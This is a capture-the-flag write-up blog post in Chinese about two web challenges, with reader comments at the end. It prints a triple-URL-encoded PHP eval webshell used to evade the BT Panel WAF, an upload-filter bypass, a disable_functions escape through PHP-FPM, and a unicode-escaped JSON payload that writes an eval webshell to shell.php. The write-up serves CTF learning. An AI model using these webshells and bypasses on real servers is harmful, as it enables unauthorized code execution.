西湖论剑线上赛 俩web

/ 7评 / 0

 

New Upload

文件上传

image-20201008134137211

测试以后发现除php后缀都能传上去。。
后来发现 0a污染就能传php了

image-20201008134249347

然后就是绕宝塔wafdisable_function
测试后发现宝塔waf不能解析三次url编码。。

<?php
eval(urldecode(urldecode(urldecode($_POST['ha1c9on']))));

把payload编码三次就可以绕了
在phpinfo里发现需要绕disable_function

image-20201008134626589

发现有fpm
猜测fpm打。发现tmp目录下果然有php-cgi-74.sock
打开蚁剑 选择disable_function插件
注:可以将用burp代理蚁剑,urlencode后传参好像应该也行。
或者自己写一下蚁剑的编码器,呜呜呜

image-20201008134835259

./readflag

image-20201008134920555

easyjson

Post:
{"\u0063\u006f\u006e\u0074\u0065\u006e\u0074":"\u003c\u003f\u0070\u0068\u0070\u0020\u0065\u0076\u0061\u006c\u0028\u0024\u005f\u0050\u004f\u0053\u0054\u005b\u0031\u005d\u0029\u003b\u003f\u003e"}
GET:
action=write&source=1&filename=shell.php

  1. 蔡正曦说道:

    师傅的蚁剑是啥版本的啊我蚁剑比赛时连不上啊

  2. 夏天说道:

    师傅能把蚁剑的具体链接贴出来吗,具体流程,我连上,上传成功,但是打不成功

  3. M说道:

    用蚁剑的插件把 打的fpm,为啥传上去之后还是 不能disabled_function 呀

  4. M说道:

    编码器写了,用蚁剑的插件把 so文件和ant.php文件都成功上传,但是去连那个ant.php的时候 连不上去。大师傅知道是什么情况吗

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注